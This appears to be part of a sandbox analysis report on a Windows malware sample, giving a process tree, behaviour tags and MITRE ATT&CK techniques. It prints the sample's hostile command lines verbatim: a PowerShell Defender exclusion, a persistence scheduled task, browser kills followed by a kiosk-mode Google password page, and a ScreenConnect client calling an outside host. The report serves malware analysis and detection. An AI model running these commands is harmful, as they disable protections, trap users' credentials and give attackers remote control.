        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'smss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2692
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "smss" /tr "C:\Users\Admin\AppData\Local\Temp\smss.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4368
      - C:\Users\Admin\AppData\Local\Temp\10381450101\2983c11b74.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381450101\2983c11b74.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4268
      - C:\Users\Admin\AppData\Local\Temp\10381460101\05be0399a2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381460101\05be0399a2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2856
      - C:\Users\Admin\AppData\Local\Temp\10381470101\7ef3f93a66.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381470101\7ef3f93a66.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:444
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2004
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:1952
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:4368
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:3368
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:3032
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:2588
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3440
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {eda74055-35d7-4bdd-a1fb-d743c4cb5cae} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:4368
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2484 -prefsLen 27135 -prefMapHandle 2488 -prefMapSize 270279 -ipcHandle 2492 -initialChannelId {0edaf4aa-32dd-4133-a68f-cb28823a2b41} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:3484
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3800 -prefsLen 25164 -prefMapHandle 3804 -prefMapSize 270279 -jsInitHandle 3808 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3816 -initialChannelId {d937caec-12fa-46a1-952c-fba0ed7d56a6} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:5228
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3992 -prefsLen 27276 -prefMapHandle 3996 -prefMapSize 270279 -ipcHandle 3840 -initialChannelId {d0bf5d4b-a78f-4023-8de5-88e0c03e3dc6} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:5260
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1664 -prefsLen 34775 -prefMapHandle 3204 -prefMapSize 270279 -jsInitHandle 3000 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4388 -initialChannelId {2b5cf9b2-337d-4a01-bb3f-07d80437f100} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:5704
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5280 -prefsLen 35012 -prefMapHandle 5284 -prefMapSize 270279 -ipcHandle 5292 -initialChannelId {69ac1d29-b11f-4df5-a3ec-356fe05751e6} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:6780
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5468 -prefsLen 32900 -prefMapHandle 5472 -prefMapSize 270279 -jsInitHandle 5476 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5480 -initialChannelId {3fbfe4f9-6e6b-409d-8b1a-8b3280107bc5} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:6852
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5752 -prefsLen 32900 -prefMapHandle 5756 -prefMapSize 270279 -jsInitHandle 5760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5732 -initialChannelId {37f995a0-e386-4daf-8b5c-7632dc9e5f35} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:6952
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5776 -prefsLen 32900 -prefMapHandle 5780 -prefMapSize 270279 -jsInitHandle 5784 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5724 -initialChannelId {65e5415e-47fa-4e18-990b-d2ba9a55e9ab} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:6960
      - C:\Users\Admin\AppData\Local\Temp\10381480101\ae9ab2f9a7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381480101\ae9ab2f9a7.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5460
      - C:\Users\Admin\AppData\Local\Temp\10381490101\0af0a2f978.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381490101\0af0a2f978.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6660
      - C:\Users\Admin\AppData\Local\Temp\10381500101\389dc2db95.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381500101\389dc2db95.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5824
      - C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4008
      - C:\Users\Admin\AppData\Local\Temp\10381520101\1310185143.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381520101\1310185143.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381520101\1310185143.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7012
      - C:\Users\Admin\AppData\Local\Temp\10381530101\842890bd89.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381530101\842890bd89.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7088
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6928
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6040
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6032
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6892
      - C:\Users\Admin\AppData\Local\Temp\10381540101\88e128475c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381540101\88e128475c.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5460
      - C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6736
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
        7⤵
        Enumerates connected drives
        Suspicious use of FindShellTrayWindow
        
        PID:7076
      - C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7060
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4340

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1040

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 50AFF144DCF597C4779DCE41C282C693 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4840
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI608A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240673015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4568
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:5040
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 78160B2577CA7B06F6A076D2A0D88BC7
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4320
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C9B507D3301384497EB43BE89FC601C3 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:4128
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D01E534E3464E31F12EA82ADE440F0E1 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5988
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIAA30.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240757343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3220
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C73A214114A08B1AAD62F8C8BAD04C4D
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4976

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
PID:5060
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:4268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
PID:4056

C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=d1968bf2-fc89-4cfc-baae-f9f7dd88acf1&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4384
- C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "a93597c2-d849-4cd8-99c3-a02dc415fecd" "User"
  2⤵
  - Executes dropped EXE
  PID:4728
- C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "aebcedaf-40f3-432a-ad45-a92ed3244d11" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4196

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4912

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:3368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\smss.exe
1⤵
PID:3032
- C:\Users\Admin\AppData\Local\Temp\smss.exe
  C:\Users\Admin\AppData\Local\Temp\smss.exe
  2⤵
  - Executes dropped EXE
  PID:3968

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6140

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:3268

C:\Users\Admin\AppData\Local\Temp\smss.exe
C:\Users\Admin\AppData\Local\Temp\smss.exe
1⤵
- Executes dropped EXE
PID:4700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion